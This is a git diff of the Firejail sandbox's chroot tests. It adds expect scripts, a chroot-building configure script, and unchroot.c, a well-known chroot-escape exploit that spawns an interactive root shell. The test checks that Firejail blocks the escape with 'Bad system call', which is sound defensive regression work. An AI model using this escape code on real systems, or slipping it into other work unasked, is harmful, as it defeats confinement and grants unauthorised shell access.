diff options
Diffstat (limited to 'test')
-rwxr-xr-x | test/chroot/chroot-resolvconf.exp | 14 | ||||
-rwxr-xr-x | test/chroot/chroot.sh | 21 | ||||
-rwxr-xr-x | test/chroot/configure | 46 | ||||
-rwxr-xr-x | test/chroot/fs_chroot.exp | 26 | ||||
-rwxr-xr-x | test/chroot/unchroot-as-root.exp | 27 | ||||
-rw-r--r-- | test/chroot/unchroot.c | 40 |
6 files changed, 140 insertions, 34 deletions
diff --git a/test/chroot/chroot-resolvconf.exp b/test/chroot/chroot-resolvconf.exp deleted file mode 100755 index 2d0da2fb0..000000000 --- a/test/chroot/chroot-resolvconf.exp +++ /dev/null | |||
@@ -1,14 +0,0 @@ | |||
1 | #!/usr/bin/expect -f | ||
2 | |||
3 | set timeout 10 | ||
4 | spawn $env(SHELL) | ||
5 | match_max 100000 | ||
6 | |||
7 | send -- "firejail --chroot=/tmp/chroot /bin/bash\r" | ||
8 | expect { | ||
9 | timeout {puts "TESTING ERROR 0\n";exit} | ||
10 | "invalid /tmp/chroot/etc/resolv.conf file" | ||
11 | } | ||
12 | |||
13 | puts "\nall done\n" | ||
14 | |||
diff --git a/test/chroot/chroot.sh b/test/chroot/chroot.sh new file mode 100755 index 000000000..34bff2a67 --- /dev/null +++ b/test/chroot/chroot.sh | |||
@@ -0,0 +1,21 @@ | |||
1 | #!/bin/bash | ||
2 | # This file is part of Firejail project | ||
3 | # Copyright (C) 2014-2016 Firejail Authors | ||
4 | # License GPL v2 | ||
5 | |||
6 | export MALLOC_CHECK_=3 | ||
7 | export MALLOC_PERTURB_=$(($RANDOM % 255 + 1)) | ||
8 | |||
9 | rm -f unchroot | ||
10 | gcc -o unchroot unchroot.c | ||
11 | sudo ./configure | ||
12 | |||
13 | echo "TESTING: chroot (test/chroot/fs_chroot.exp)" | ||
14 | ./fs_chroot.exp | ||
15 | |||
16 | echo "TESTING: unchroot as root (test/chroot/unchroot-as-root.exp)" | ||
17 | sudo ./unchroot-as-root.exp | ||
18 | |||
19 | |||
20 | |||
21 | rm -f unchroot | ||
diff --git a/test/chroot/configure b/test/chroot/configure new file mode 100755 index 000000000..ba8238803 --- /dev/null +++ b/test/chroot/configure | |||
@@ -0,0 +1,46 @@ | |||
1 | #!/bin/bash | ||
2 | |||
3 | # build a very small chroot | ||
4 | ROOTDIR="/tmp/chroot" # default chroot directory | ||
5 | DEFAULT_FILES="/bin/bash /bin/sh " # basic chroot files | ||
6 | DEFAULT_FILES+="/etc/passwd /etc/nsswitch.conf /etc/group " | ||
7 | DEFAULT_FILES+=`find /lib -name libnss*` # files required by glibc | ||
8 | DEFAULT_FILES+=" /bin/cp /bin/ls /bin/cat /bin/ps /bin/netstat /bin/ping /sbin/ifconfig /usr/bin/touch /bin/ip /bin/hostname /bin/grep /usr/bin/dig /usr/bin/openssl /usr/bin/id /usr/bin/getent /usr/bin/whoami /usr/bin/wc /usr/bin/wget /bin/umount" | ||
9 | |||
10 | rm -fr $ROOTDIR | ||
11 | mkdir -p $ROOTDIR/{root,bin,lib,lib64,usr,home,etc,dev/shm,tmp,var/run,var/tmp,var/lock,var/log,proc} | ||
12 | chmod 777 $ROOTDIR/tmp | ||
13 | mkdir -p $ROOTDIR/etc/firejail | ||
14 | mkdir -p $ROOTDIR/home/netblue/.config/firejail | ||
15 | chown netblue:netblue $ROOTDIR/home/netblue | ||
16 | chown netblue:netblue $ROOTDIR/home/netblue/.config | ||
17 | cp /home/netblue/.Xauthority $ROOTDIR/home/netblue/. | ||
18 | cp -a /etc/skel $ROOTDIR/etc/. | ||
19 | mkdir $ROOTDIR/home/someotheruser | ||
20 | mkdir $ROOTDIR/boot | ||
21 | mkdir $ROOTDIR/selinux | ||
22 | cp /etc/passwd $ROOTDIR/etc/. | ||
23 | cp /etc/group $ROOTDIR/etc/. | ||
24 | cp /etc/hosts $ROOTDIR/etc/. | ||
25 | cp /etc/hostname $ROOTDIR/etc/. | ||
26 | mkdir -p $ROOTDIR/usr/lib/x86_64-linux-gnu | ||
27 | cp -a /usr/lib/x86_64-linux-gnu/openssl-1.0.0 $ROOTDIR/usr/lib/x86_64-linux-gnu/. | ||
28 | cp -a /usr/lib/ssl $ROOTDIR/usr/lib/. | ||
29 | touch $ROOTDIR/var/log/syslog | ||
30 | touch $ROOTDIR/var/tmp/somefile | ||
31 | SORTED=`for FILE in $* $DEFAULT_FILES; do echo " $FILE "; ldd $FILE | grep -v dynamic | cut -d " " -f 3; done | sort -u` | ||
32 | for FILE in $SORTED | ||
33 | do | ||
34 | cp --parents $FILE $ROOTDIR | ||
35 | done | ||
36 | cp --parents /lib64/ld-linux-x86-64.so.2 $ROOTDIR | ||
37 | cp --parents /lib/ld-linux.so.2 $ROOTDIR | ||
38 | cp unchroot $ROOTDIR/. | ||
39 | touch $ROOTDIR/this-is-my-chroot | ||
40 | |||
41 | cd $ROOTDIR; find . | ||
42 | mkdir -p usr/lib/firejail/ | ||
43 | cp /usr/lib/firejail/libtrace.so usr/lib/firejail/. | ||
44 | |||
45 | |||
46 | echo "To enter the chroot directory run: firejail --chroot=$ROOTDIR" | ||
diff --git a/test/chroot/fs_chroot.exp b/test/chroot/fs_chroot.exp index aeb5669e1..295ff8ff9 100755 --- a/test/chroot/fs_chroot.exp +++ b/test/chroot/fs_chroot.exp | |||
@@ -20,19 +20,14 @@ expect { | |||
20 | sleep 1 | 20 | sleep 1 |
21 | send -- "bash\r" | 21 | send -- "bash\r" |
22 | sleep 1 | 22 | sleep 1 |
23 | send -- "ls /; pwd\r" | 23 | send -- "ls /\r" |
24 | expect { | 24 | expect { |
25 | timeout {puts "TESTING ERROR 0.2\n";exit} | 25 | timeout {puts "TESTING ERROR 0.2\n";exit} |
26 | "this-is-my-chroot" | 26 | "this-is-my-chroot" |
27 | } | 27 | } |
28 | expect { | 28 | after 100 |
29 | timeout {puts "TESTING ERROR 0.3\n";exit} | ||
30 | "home" | ||
31 | } | ||
32 | |||
33 | 29 | ||
34 | 30 | send -- "ps aux\r" | |
35 | send -- "ps aux; pwd\r" | ||
36 | expect { | 31 | expect { |
37 | timeout {puts "TESTING ERROR 1\n";exit} | 32 | timeout {puts "TESTING ERROR 1\n";exit} |
38 | "/bin/bash" | 33 | "/bin/bash" |
@@ -45,23 +40,14 @@ expect { | |||
45 | timeout {puts "TESTING ERROR 3\n";exit} | 40 | timeout {puts "TESTING ERROR 3\n";exit} |
46 | "ps aux" | 41 | "ps aux" |
47 | } | 42 | } |
48 | expect { | 43 | after 100 |
49 | timeout {puts "TESTING ERROR 4\n";exit} | ||
50 | "home" | ||
51 | } | ||
52 | sleep 1 | ||
53 | 44 | ||
54 | 45 | send -- "ps aux | wc -l; pwd\r" | |
55 | send -- "ps aux |wc -l; pwd\r" | ||
56 | expect { | 46 | expect { |
57 | timeout {puts "TESTING ERROR 5\n";exit} | 47 | timeout {puts "TESTING ERROR 5\n";exit} |
58 | "6" | 48 | "6" |
59 | } | 49 | } |
60 | expect { | 50 | after 100 |
61 | timeout {puts "TESTING ERROR 6\n";exit} | ||
62 | "home" | ||
63 | } | ||
64 | sleep 1 | ||
65 | 51 | ||
66 | 52 | ||
67 | puts "all done\n" | 53 | puts "all done\n" |
diff --git a/test/chroot/unchroot-as-root.exp b/test/chroot/unchroot-as-root.exp new file mode 100755 index 000000000..9f8a1d784 --- /dev/null +++ b/test/chroot/unchroot-as-root.exp | |||
@@ -0,0 +1,27 @@ | |||
1 | #!/usr/bin/expect -f | ||
2 | |||
3 | set timeout 10 | ||
4 | spawn $env(SHELL) | ||
5 | match_max 100000 | ||
6 | |||
7 | send -- "firejail --chroot=/tmp/chroot\r" | ||
8 | expect { | ||
9 | timeout {puts "TESTING ERROR 0\n";exit} | ||
10 | "Error: --chroot option is not available on Grsecurity systems" {puts "\nall done\n"; exit} | ||
11 | "Child process initialized" {puts "chroot available\n"}; | ||
12 | } | ||
13 | sleep 1 | ||
14 | |||
15 | send -- "cd /\r" | ||
16 | after 100 | ||
17 | |||
18 | |||
19 | send -- "./unchroot\r" | ||
20 | expect { | ||
21 | timeout {puts "TESTING ERROR 1\n";exit} | ||
22 | "Bad system call" | ||
23 | } | ||
24 | after 100 | ||
25 | |||
26 | puts "all done\n" | ||
27 | |||
diff --git a/test/chroot/unchroot.c b/test/chroot/unchroot.c new file mode 100644 index 000000000..1982e07f3 --- /dev/null +++ b/test/chroot/unchroot.c | |||
@@ -0,0 +1,40 @@ | |||
1 | // simple unchroot example from http://linux-vserver.org/Secure_chroot_Barrier | ||
2 | #include <unistd.h> | ||
3 | #include <stdlib.h> | ||
4 | #include <stdio.h> | ||
5 | #include <sys/types.h> | ||
6 | #include <sys/stat.h> | ||
7 | |||
8 | void die(char *msg) { | ||
9 | perror(msg); | ||
10 | exit(1); | ||
11 | } | ||
12 | |||
13 | int main(int argc, char *argv[]) | ||
14 | { | ||
15 | int i; | ||
16 | |||
17 | if (chdir("/") != 0) | ||
18 | die("chdir(/)"); | ||
19 | |||
20 | if (mkdir("baz", 0777) != 0) | ||
21 | ; //die("mkdir(baz)"); | ||
22 | |||
23 | if (chroot("baz") != 0) | ||
24 | die("chroot(baz)"); | ||
25 | |||
26 | for (i=0; i<50; i++) { | ||
27 | if (chdir("..") != 0) | ||
28 | die("chdir(..)"); | ||
29 | } | ||
30 | |||
31 | if (chroot(".") != 0) | ||
32 | die("chroot(.)"); | ||
33 | |||
34 | printf("Exploit seems to work. =)\n"); | ||
35 | |||
36 | execl("/bin/bash", "bash", "-i", (char *)0); | ||
37 | die("exec bash"); | ||
38 | |||
39 | exit(0); | ||
40 | } | ||